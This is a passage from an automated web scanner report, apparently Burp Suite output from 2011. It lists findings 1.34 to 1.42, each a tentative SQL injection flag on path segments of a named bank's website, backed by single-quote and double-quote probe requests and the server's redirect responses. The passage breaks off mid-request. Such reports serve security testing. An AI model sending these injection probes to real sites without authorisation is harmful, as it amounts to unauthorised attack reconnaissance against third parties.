User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/privacy_security.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557010832:ss=1305556924172

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:44:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/report_fraud.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2freport_fraud.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/report_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/privacy_security.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557010832:ss=1305556924172

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:44:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.34. http://www.regions.com/personal_banking/email_starting_net.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/email_starting_net.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/email_starting_net.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555429176:ss=1305555382886

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/email_starting_net.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2femail_starting_net.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/email_starting_net.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555429176:ss=1305555382886

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.35. http://www.regions.com/personal_banking/get_started_autoloan.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_autoloan.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_autoloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555463799:ss=1305555382886

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Set-Cookie: www.regions.com-http=R1402696235; path=/
Date: Mon, 16 May 2011 15:21:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_autoloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555463799:ss=1305555382886

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:24 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.36. http://www.regions.com/personal_banking/get_started_cds.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_cds.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_cds.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_cds.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:19 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.37. http://www.regions.com/personal_banking/get_started_heloan.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_heloan.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_heloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555462492:ss=1305555382886

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_heloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555462492:ss=1305555382886

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:21 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.38. http://www.regions.com/personal_banking/get_started_heloc.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_heloc.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_heloc.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555457332:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_heloc.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555457332:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:20 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.39. http://www.regions.com/personal_banking/get_started_installmentloan.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_installmentloan.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_installmentloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555465061:ss=1305555382886

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_installmentloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555465061:ss=1305555382886

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:18 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.40. http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_lifegreen_checking.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_lifegreen_checking.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555439504:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/get_started_lifegreen_checking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fget_started_lifegreen_checking.rf">here</a>.</h2>
</body>
...[SNIP]...

Request 2

GET /personal_banking''/get_started_lifegreen_checking.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555439504:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.41. http://www.regions.com/personal_banking/loans_credit.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/loans_credit.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/loans_credit.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/email_starting_net.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555433792:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/loans_credit.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 191

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2floans_credit.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/loans_credit.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/email_starting_net.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555433792:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.42. http://www.regions.com/personal_banking/online_banking_help.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/online_banking_help.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/online_banking_help.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
